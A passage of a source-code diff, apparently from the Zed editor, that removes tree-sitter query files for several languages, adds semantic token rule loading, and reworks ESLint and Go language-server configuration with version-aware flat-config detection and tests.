(_) @name) @item - -(field_declaration - type: (_) @context - declarator: (field_identifier) @name) @item - -(type_definition - "typedef" @context - declarator: (_) @name) @item - -(declaration - (type_qualifier)? @context - type: (_)? @context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - ] -) @item - -(function_definition - (type_qualifier)? @context - type: (_)? @context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - ] -) @item - -(comment) @annotation diff --git a/crates/languages/src/c/runnables.scm b/crates/languages/src/c/runnables.scm deleted file mode 100644 index 5a203f5d7a6eea3ab831a1b4281a74d3795ca74f..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/runnables.scm +++ /dev/null @@ -1,10 +0,0 @@ -; Tag the main function -( - (function_definition - declarator: (function_declarator - declarator: (identifier) @run - ) - ) @_c-main - (#eq? @run "main") - (#set! tag c-main) -) diff --git a/crates/languages/src/c/textobjects.scm b/crates/languages/src/c/textobjects.scm deleted file mode 100644 index e29f508b701c8ee22eec27af47d899d446e67860..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/textobjects.scm +++ /dev/null @@ -1,31 +0,0 @@ -(declaration - declarator: (function_declarator)) @function.around - -(function_definition - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -(preproc_function_def - value: (_) @function.inside) @function.around - -(comment) @comment.around - -(struct_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(enum_specifier - body: (_ - "{" - [(_) ","?]* @class.inside - "}")) @class.around - -(union_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around diff --git a/crates/languages/src/cpp.rs b/crates/languages/src/cpp.rs index 85a3fb5045275648282c7a8cbad58779491ad7dc..5985baa54808b86a62e9d7ade38dca3480931459 100644 --- a/crates/languages/src/cpp.rs +++ b/crates/languages/src/cpp.rs @@ -1,3 +1,13 @@ +use settings::SemanticTokenRules; + +pub(crate) fn semantic_token_rules() -> SemanticTokenRules { + let content = grammars::get_file("cpp/semantic_token_rules.json") + .expect("missing cpp/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse cpp semantic_token_rules.json") +} + #[cfg(test)] mod tests { use gpui::{AppContext as _, BorrowAppContext, TestAppContext}; diff --git a/crates/languages/src/cpp/brackets.scm b/crates/languages/src/cpp/brackets.scm deleted file mode 100644 index 9eaebba332861ef716902b3827d4940b71f37221..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/brackets.scm +++ /dev/null @@ -1,6 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/cpp/imports.scm b/crates/languages/src/cpp/imports.scm deleted file mode 100644 index a4ef817a80dbcd44336bdd8cd681587662aad435..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/imports.scm +++ /dev/null @@ -1,5 +0,0 @@ -(preproc_include - path: [ - ((system_lib_string) @source @wildcard) - (string_literal (string_content) @source @wildcard) - ]) @import diff --git a/crates/languages/src/cpp/indents.scm b/crates/languages/src/cpp/indents.scm deleted file mode 100644 index 985ebda6ffe679f479804d667db011587eacb2f9..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/indents.scm +++ /dev/null @@ -1,23 +0,0 @@ -[ - (field_expression) - (assignment_expression) - (init_declarator) - (if_statement) - (for_statement) - (while_statement) - (do_statement) - (else_clause) -] @indent - -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -((comment) @indent - (#match? @indent "^/\\*")) - -(if_statement) @start.if -(for_statement) @start.for -(while_statement) @start.while -(do_statement) @start.do -(switch_statement) @start.switch -(else_clause) @start.else diff --git a/crates/languages/src/cpp/outline.scm b/crates/languages/src/cpp/outline.scm deleted file mode 100644 index 75be97a916dca9f10b044ee9dc01eca09e6372ec..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/outline.scm +++ /dev/null @@ -1,186 +0,0 @@ -(preproc_def - "#define" @context - name: (_) @name) @item - -(preproc_function_def - "#define" @context - name: (_) @name - parameters: (preproc_params - "(" @context - ")" @context)) @item - -(namespace_definition - "inline"? @context - "namespace" @context - name: (_) @name) @item - -(type_definition - "typedef" @context - declarator: (_) @name) @item - -(struct_specifier - "struct" @context - name: (_) @name) @item - -(class_specifier - "class" @context - name: (_) @name) @item - -(enum_specifier - "enum" @context - [ - "class" - "struct" - ]? @context - name: (_) @name) @item - -(union_specifier - "union" @context - name: (_) @name) @item - -(enumerator - name: (_) @name) @item - -(concept_definition - "concept" @context - name: (_) @name) @item - -(declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_) @context - declarator: [ - ; The declaration may define multiple variables, using @item on the - ; declarator so that they get distinct ranges. - (init_declarator - declarator: (_) @item @name) - (identifier) @item @name - ] @item) - -(function_definition - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_)? @context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ] - (type_qualifier)? @context) @item - -(declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_)? @context - declarator: [ - (field_identifier) @name - (pointer_declarator - "*" @context - declarator: (field_identifier) @name) - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ] - (type_qualifier)? @context) @item - -(field_declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_) @context - declarator: [ - (field_identifier) @name - (pointer_declarator - "*" @context - declarator: (field_identifier) @name) - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ; Fields declarations may define multiple fields, and so @item is on the - ; declarator so they each get distinct ranges. - ] @item - (type_qualifier)? @context) - -(comment) @annotation diff --git a/crates/languages/src/cpp/textobjects.scm b/crates/languages/src/cpp/textobjects.scm deleted file mode 100644 index 027185a0cfab7b71f3dcd6a5d5507445e2778d34..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/textobjects.scm +++ /dev/null @@ -1,37 +0,0 @@ -(declaration - declarator: (function_declarator)) @function.around - -(function_definition - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -(preproc_function_def - value: (_) @function.inside) @function.around - -(comment) @comment.around - -(struct_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(enum_specifier - body: (_ - "{" - [(_) ","?]* @class.inside - "}")) @class.around - -(union_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(class_specifier - body: (_ - "{" - [(_) ":"? ";"?]* @class.inside - "}"?)) @class.around diff --git a/crates/languages/src/css.rs b/crates/languages/src/css.rs index c5c89a0c66431380cf9f500a23b74a19230f3046..6a8fb730a0faa6430d252cdd189d0620fcd07e4a 100644 --- a/crates/languages/src/css.rs +++ b/crates/languages/src/css.rs @@ -134,6 +134,7 @@ impl LspAdapter for CssLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true diff --git a/crates/languages/src/css/brackets.scm b/crates/languages/src/css/brackets.scm deleted file mode 100644 index 2149bddc6c9a7ec04667d03da75580b676e12a28..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/brackets.scm +++ /dev/null @@ -1,5 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/css/indents.scm b/crates/languages/src/css/indents.scm deleted file mode 100644 index e9754690920500f55e611f981e46d0365560eb4f..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/indents.scm +++ /dev/null @@ -1 +0,0 @@ -(_ "{" "}" @end) @indent diff --git a/crates/languages/src/css/injections.scm b/crates/languages/src/css/injections.scm deleted file mode 100644 index 9117c713b98fdd2896b13e4949a77c6489b9ee36..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/injections.scm +++ /dev/null @@ -1,3 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) diff --git a/crates/languages/src/css/outline.scm b/crates/languages/src/css/outline.scm deleted file mode 100644 index 645616f9056d0cc9e85232e94f5d0666809884c6..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/outline.scm +++ /dev/null @@ -1,18 +0,0 @@ -(stylesheet - (import_statement - "@import" @context - ((string_value) @name)) @item) - - -(rule_set - (selectors - . - (_) @name - ("," @name (_) @name)* - )) @item - -(media_statement - "@media" @context - (_) @name - (block) -) @item diff --git a/crates/languages/src/css/textobjects.scm b/crates/languages/src/css/textobjects.scm deleted file mode 100644 index c9c6207b851e6b4c5908ce7d664616798db27f3b..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/textobjects.scm +++ /dev/null @@ -1,30 +0,0 @@ -(comment) @comment.around - -(rule_set - (block ( - "{" - (_)* @function.inside - "}" ))) @function.around -(keyframe_block - (block ( - "{" - (_)* @function.inside - "}" ))) @function.around - -(media_statement - (block ( - "{" - (_)* @class.inside - "}" ))) @class.around - -(supports_statement - (block ( - "{" - (_)* @class.inside - "}" ))) @class.around - -(keyframes_statement - (keyframe_block_list ( - "{" - (_)* @class.inside - "}" ))) @class.around diff --git a/crates/languages/src/diff/injections.scm b/crates/languages/src/diff/injections.scm deleted file mode 100644 index 01e833d1e31d480b66a558bdfb8f07b2f0cdbc46..0000000000000000000000000000000000000000 --- a/crates/languages/src/diff/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment")) diff --git a/crates/languages/src/eslint.rs b/crates/languages/src/eslint.rs index 943034652de852b2c39b4887218c3c8e28f329e1..7ef55c64ef1b35fa42f35e779c4cf46b30a18ee5 100644 --- a/crates/languages/src/eslint.rs +++ b/crates/languages/src/eslint.rs @@ -7,8 +7,10 @@ use http_client::{ }; use language::{LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain}; use lsp::{CodeActionKind, LanguageServerBinary, LanguageServerName, Uri}; -use node_runtime::NodeRuntime; +use node_runtime::{NodeRuntime, read_package_installed_version}; +use project::Fs; use project::lsp_store::language_server_settings_for; +use semver::Version; use serde::{Deserialize, Serialize}; use serde_json::{Value, json}; use settings::SettingsLocation; @@ -31,11 +33,12 @@ fn eslint_server_binary_arguments(server_path: &Path) -> Vec { pub struct EsLintLspAdapter { node: NodeRuntime, + fs: Arc, } impl EsLintLspAdapter { - const CURRENT_VERSION: &'static str = "2.4.4"; - const CURRENT_VERSION_TAG_NAME: &'static str = "release/2.4.4"; + const CURRENT_VERSION: &'static str = "3.0.24"; + const CURRENT_VERSION_TAG_NAME: &'static str = "release/3.0.24"; #[cfg(not(windows))] const GITHUB_ASSET_KIND: AssetKind = AssetKind::TarGz; @@ -45,7 +48,10 @@ impl EsLintLspAdapter { const SERVER_PATH: &'static str = "vscode-eslint/server/out/eslintServer.js"; const SERVER_NAME: LanguageServerName = LanguageServerName::new_static("eslint"); - const FLAT_CONFIG_FILE_NAMES: &'static [&'static str] = &[ + const FLAT_CONFIG_FILE_NAMES_V8_21: &'static [&'static str] = &["eslint.config.js"]; + const FLAT_CONFIG_FILE_NAMES_V8_57: &'static [&'static str] = + &["eslint.config.js", "eslint.config.mjs", "eslint.config.cjs"]; + const FLAT_CONFIG_FILE_NAMES_V10: &'static [&'static str] = &[ "eslint.config.js", "eslint.config.mjs", "eslint.config.cjs", @@ -53,9 +59,17 @@ impl EsLintLspAdapter { "eslint.config.cts", "eslint.config.mts", ]; + const LEGACY_CONFIG_FILE_NAMES: &'static [&'static str] = &[ + ".eslintrc", + ".eslintrc.js", + ".eslintrc.cjs", + ".eslintrc.yaml", + ".eslintrc.yml", + ".eslintrc.json", + ]; - pub fn new(node: NodeRuntime) -> Self { - EsLintLspAdapter { node } + pub fn new(node: NodeRuntime, fs: Arc) -> Self { + EsLintLspAdapter { node, fs } } fn build_destination_path(container_dir: &Path) -> PathBuf { @@ -73,7 +87,7 @@ impl LspInstaller for EsLintLspAdapter { _: &mut AsyncApp, ) -> Result { let url = build_asset_url( - "zed-industries/vscode-eslint", + "microsoft/vscode-eslint", Self::CURRENT_VERSION_TAG_NAME, Self::GITHUB_ASSET_KIND, )?; @@ -148,6 +162,7 @@ impl LspInstaller for EsLintLspAdapter { ) -> Option { let server_path = Self::build_destination_path(&container_dir).join(EsLintLspAdapter::SERVER_PATH); + fs::metadata(&server_path).await.ok()?; Some(LanguageServerBinary { path: self.node.binary_path().await.ok()?, env: None, @@ -156,6 +171,42 @@ impl LspInstaller for EsLintLspAdapter { } } +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum EslintConfigKind { + Flat, + Legacy, +} + +#[derive(Debug, Default, Clone, PartialEq, Eq)] +struct EslintSettingsOverrides { + use_flat_config: Option, + experimental_use_flat_config: Option, +} + +impl EslintSettingsOverrides { + fn apply_to(self, workspace_configuration: &mut Value) { + if let Some(use_flat_config) = self.use_flat_config + && let Some(workspace_configuration) = workspace_configuration.as_object_mut() + { + workspace_configuration.insert("useFlatConfig".to_string(), json!(use_flat_config)); + } + + if let Some(experimental_use_flat_config) = self.experimental_use_flat_config + && let Some(workspace_configuration) = workspace_configuration.as_object_mut() + { + let experimental = workspace_configuration + .entry("experimental") + .or_insert_with(|| json!({})); + if let Some(experimental) = experimental.as_object_mut() { + experimental.insert( + "useFlatConfig".to_string(), + json!(experimental_use_flat_config), + ); + } + } + } +} + #[async_trait(?Send)] impl LspAdapter for EsLintLspAdapter { fn code_action_kinds(&self) -> Option> { @@ -173,9 +224,26 @@ impl LspAdapter for EsLintLspAdapter { cx: &mut AsyncApp, ) -> Result { let worktree_root = delegate.worktree_root_path(); - let use_flat_config = Self::FLAT_CONFIG_FILE_NAMES - .iter() - .any(|file| worktree_root.join(file).is_file()); + let requested_file_path = requested_uri + .as_ref() + .filter(|uri| uri.scheme() == "file") + .and_then(|uri| uri.to_file_path().ok()) + .filter(|path| path.starts_with(worktree_root)); + let eslint_version = find_eslint_version( + delegate.as_ref(), + worktree_root, + requested_file_path.as_deref(), + ) + .await?; + let config_kind = find_eslint_config_kind( + worktree_root, + requested_file_path.as_deref(), + eslint_version.as_ref(), + self.fs.as_ref(), + ) + .await; + let eslint_settings_overrides = + eslint_settings_overrides_for(eslint_version.as_ref(), config_kind); let mut default_workspace_configuration = json!({ "validate": "on", @@ -205,26 +273,13 @@ impl LspAdapter for EsLintLspAdapter { "showDocumentation": { "enable": true } - }, - "experimental": { - "useFlatConfig": use_flat_config, } }); + eslint_settings_overrides.apply_to(&mut default_workspace_configuration); - let file_path = requested_uri + let file_path = requested_file_path .as_ref() - .and_then(|uri| { - (uri.scheme() == "file") - .then(|| uri.to_file_path().ok()) - .flatten() - }) - .and_then(|abs_path| { - abs_path - .strip_prefix(&worktree_root) - .ok() - .map(ToOwned::to_owned) - }); - let file_path = file_path + .and_then(|abs_path| abs_path.strip_prefix(worktree_root).ok()) .and_then(|p| RelPath::unix(&p).ok().map(ToOwned::to_owned)) .unwrap_or_else(|| RelPath::empty().to_owned()); let override_options = cx.update(|cx| { @@ -271,6 +326,109 @@ impl LspAdapter for EsLintLspAdapter { } } +fn ancestor_directories<'a>( + worktree_root: &'a Path, + requested_file: Option<&'a Path>, +) -> impl Iterator + 'a { + let start = requested_file + .filter(|file| file.starts_with(worktree_root)) + .and_then(Path::parent) + .unwrap_or(worktree_root); + + start + .ancestors() + .take_while(move |dir| dir.starts_with(worktree_root)) +} + +fn flat_config_file_names(version: Option<&Version>) -> &'static [&'static str] { + match version { + Some(version) if version.major >= 10 => EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V10, + Some(version) if version.major == 9 => EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_57, + Some(version) if version.major == 8 && version.minor >= 57 => { + EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_57 + } + Some(version) if version.major == 8 && version.minor >= 21 => { + EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_21 + } + _ => &[], + } +} + +async fn find_eslint_config_kind( + worktree_root: &Path, + requested_file: Option<&Path>, + version: Option<&Version>, + fs: &dyn Fs, +) -> Option { + let flat_config_file_names = flat_config_file_names(version); + + for directory in ancestor_directories(worktree_root, requested_file) { + for file_name in flat_config_file_names { + if fs.is_file(&directory.join(file_name)).await { + return Some(EslintConfigKind::Flat); + } + } + + for file_name in EsLintLspAdapter::LEGACY_CONFIG_FILE_NAMES { + if fs.is_file(&directory.join(file_name)).await { + return Some(EslintConfigKind::Legacy); + } + } + } + + None +} + +fn eslint_settings_overrides_for( + version: Option<&Version>, + config_kind: Option, +) -> EslintSettingsOverrides { + // vscode-eslint 3.x already discovers config files and chooses a working + // directory from the active file on its own. Zed only overrides settings + // for the two cases where leaving everything unset is known to be wrong: + // + // - ESLint 8.21-8.56 flat config still needs experimental.useFlatConfig. + // - ESLint 9.x legacy config needs useFlatConfig = false. + // + // All other cases should defer to the server's own defaults and discovery. + let Some(version) = version else { + return EslintSettingsOverrides::default(); + }; + + match config_kind { + Some(EslintConfigKind::Flat) if version.major == 8 && (21..57).contains(&version.minor) => { + EslintSettingsOverrides { + use_flat_config: None, + experimental_use_flat_config: Some(true), + } + } + Some(EslintConfigKind::Legacy) if version.major == 9 => EslintSettingsOverrides { + use_flat_config: Some(false), + experimental_use_flat_config: None, + }, + _ => EslintSettingsOverrides::default(), + } +} + +async fn find_eslint_version( + delegate: &dyn LspAdapterDelegate, + worktree_root: &Path, + requested_file: Option<&Path>, +) -> Result> { + for directory in ancestor_directories(worktree_root, requested_file) { + if let Some(version) = + read_package_installed_version(directory.join("node_modules"), "eslint").await? + { + return Ok(Some(version)); + } + } + + Ok(delegate + .npm_package_installed_version("eslint") + .await? + .map(|(_, version)| version)) +} + /// On Windows, converts Unix-style separators (/) to Windows-style (\). /// On Unix, returns the path unchanged fn normalize_path_separators(path: &str) -> String { @@ -623,6 +781,217 @@ mod tests { } } + mod eslint_settings { + use super::*; + use ::fs::FakeFs; + use gpui::TestAppContext; + + #[test] + fn test_ancestor_directories_for_package_local_file() { + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + + let directories: Vec<&Path> = + ancestor_directories(&worktree_root, Some(&requested_file)).collect(); + + assert_eq!( + directories, + vec![ + Path::new(&unix_path_to_platform("/workspace/packages/web/src")), + Path::new(&unix_path_to_platform("/workspace/packages/web")), + Path::new(&unix_path_to_platform("/workspace/packages")), + Path::new(&unix_path_to_platform("/workspace")), + ] + ); + } + + #[test] + fn test_eslint_8_flat_root_repo_uses_experimental_flag() { + let version = Version::parse("8.56.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!( + settings, + EslintSettingsOverrides { + use_flat_config: None, + experimental_use_flat_config: Some(true), + } + ); + } + + #[test] + fn test_eslint_8_57_flat_repo_uses_no_override() { + let version = Version::parse("8.57.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!(settings, EslintSettingsOverrides::default()); + } + + #[test] + fn test_eslint_9_legacy_repo_uses_use_flat_config_false() { + let version = Version::parse("9.0.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Legacy)); + + assert_eq!( + settings, + EslintSettingsOverrides { + use_flat_config: Some(false), + experimental_use_flat_config: None, + } + ); + } + + #[test] + fn test_eslint_10_repo_uses_no_override() { + let version = Version::parse("10.0.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!(settings, EslintSettingsOverrides::default()); + } + + #[gpui::test] + async fn test_eslint_8_56_does_not_treat_cjs_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.cjs": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + let version = Version::parse("8.56.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, None); + } + + #[gpui::test] + async fn test_eslint_8_57_treats_cjs_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.cjs": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + let version = Version::parse("8.57.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_eslint_10_treats_typescript_config_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.ts": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + let version = Version::parse("10.0.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_package_local_flat_config_is_preferred_for_monorepo_file( + cx: &mut TestAppContext, + ) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ + "eslint.config.js": "", + "packages": { + "web": { + "eslint.config.js": "" + } + } + }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + let version = Version::parse("8.56.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_package_local_legacy_config_is_detected_for_eslint_9( + cx: &mut TestAppContext, + ) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ + "packages": { + "web": { + ".eslintrc.cjs": "" + } + } + }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + let version = Version::parse("9.0.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Legacy)); + } + } + #[cfg(windows)] mod windows_style_paths { use super::*; diff --git a/crates/languages/src/gitcommit/injections.scm b/crates/languages/src/gitcommit/injections.scm deleted file mode 100644 index 8fb9b459679489be7588d1ab9b6d53e40ea10c60..0000000000000000000000000000000000000000 --- a/crates/languages/src/gitcommit/injections.scm +++ /dev/null @@ -1,9 +0,0 @@ -((comment) @content - (#set! injection.language "comment") -) - -((scissors) @content - (#set! "language" "diff")) - -((rebase_command) @content - (#set! "language" "git_rebase")) diff --git a/crates/languages/src/go.rs b/crates/languages/src/go.rs index abcb890566d9c0d0d6d9fe85b565c74825775250..73e9b162f4d6e76c4a42d4e24accfd90e79733c9 100644 --- a/crates/languages/src/go.rs +++ b/crates/languages/src/go.rs @@ -2,14 +2,19 @@ use anyhow::{Context as _, Result}; use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; -use gpui::{App, AsyncApp, Task}; +use gpui::{App, AsyncApp, Entity, Task}; use http_client::github::latest_github_release; pub use language::*; -use language::{LanguageToolchainStore, LspAdapterDelegate, LspInstaller}; +use language::{ + LanguageName, LanguageToolchainStore, LspAdapterDelegate, LspInstaller, + language_settings::LanguageSettings, +}; use lsp::{LanguageServerBinary, LanguageServerName}; +use project::lsp_store::language_server_settings; use regex::Regex; -use serde_json::json; +use serde_json::{Value, json}; +use settings::SemanticTokenRules; use smol::fs; use std::{ borrow::Cow, @@ -24,7 +29,15 @@ use std::{ }, }; use task::{TaskTemplate, TaskTemplates, TaskVariables, VariableName}; -use util::{ResultExt, fs::remove_matching, maybe}; +use util::{ResultExt, fs::remove_matching, maybe, merge_json_value_into}; + +pub(crate) fn semantic_token_rules() -> SemanticTokenRules { + let content = grammars::get_file("go/semantic_token_rules.json") + .expect("missing go/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse go semantic_token_rules.json") +} fn server_binary_arguments() -> Vec { vec!["-mode=stdio".into()] @@ -192,9 +205,16 @@ impl LspAdapter for GoLspAdapter { async fn initialization_options( self: Arc, - _: &Arc, + delegate: &Arc, + cx: &mut AsyncApp, ) -> Result> { - Ok(Some(json!({ + let semantic_tokens_enabled = cx.update(|cx| { + LanguageSettings::resolve(None, Some(&LanguageName::new("Go")), cx) + .semantic_tokens + .enabled() + }); + + let mut default_config = json!({ "usePlaceholders": false, "hints": { "assignVariableTypes": true, @@ -204,8 +224,35 @@ impl LspAdapter for GoLspAdapter { "functionTypeParameters": true, "parameterNames": true, "rangeVariableTypes": true - } - }))) + }, + "semanticTokens": semantic_tokens_enabled + }); + + let project_initialization_options = cx.update(|cx| { + language_server_settings(delegate.as_ref(), &self.name(), cx) + .and_then(|s| s.initialization_options.clone()) + }); + + if let Some(override_options) = project_initialization_options { + merge_json_value_into(override_options, &mut default_config); + } + + Ok(Some(default_config)) + } + + async fn workspace_configuration( + self: Arc, + delegate: &Arc, + _: Option, + _: Option, + cx: &mut AsyncApp, + ) -> Result { + Ok(cx + .update(|cx| { + language_server_settings(delegate.as_ref(), &self.name(), cx) + .and_then(|settings| settings.settings.clone()) + }) + .unwrap_or_default()) } async fn label_for_completion( @@ -544,7 +591,7 @@ impl ContextProvider for GoContextProvider { ))) } - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { let package_cwd = if GO_PACKAGE_TASK_VARIABLE.template_value() == "." { None } else { diff --git a/crates/languages/src/go/brackets.scm b/crates/languages/src/go/brackets.scm deleted file mode 100644 index 05fb1d7f9219889d652bbdbb294ca45e72cc9c05..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/brackets.scm +++ /dev/null @@ -1,6 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -((rune_literal) @open @close (#set! rainbow.exclude)) diff --git a/crates/languages/src/go/debugger.scm b/crates/languages/src/go/debugger.scm deleted file mode 100644 index f22b91f938e1159fa9bfec99f5000976766faf06..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/debugger.scm +++ /dev/null @@ -1,26 +0,0 @@ -(parameter_declaration (identifier) @debug-variable) - -(short_var_declaration (expression_list (identifier) @debug-variable)) - -(var_declaration (var_spec (identifier) @debug-variable)) - -(const_declaration (const_spec (identifier) @debug-variable)) - -(assignment_statement (expression_list (identifier) @debug-variable)) - -(binary_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(call_expression (argument_list (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]"))) - -(return_statement (expression_list (identifier) @debug-variable - (#not-match? @debug-variable 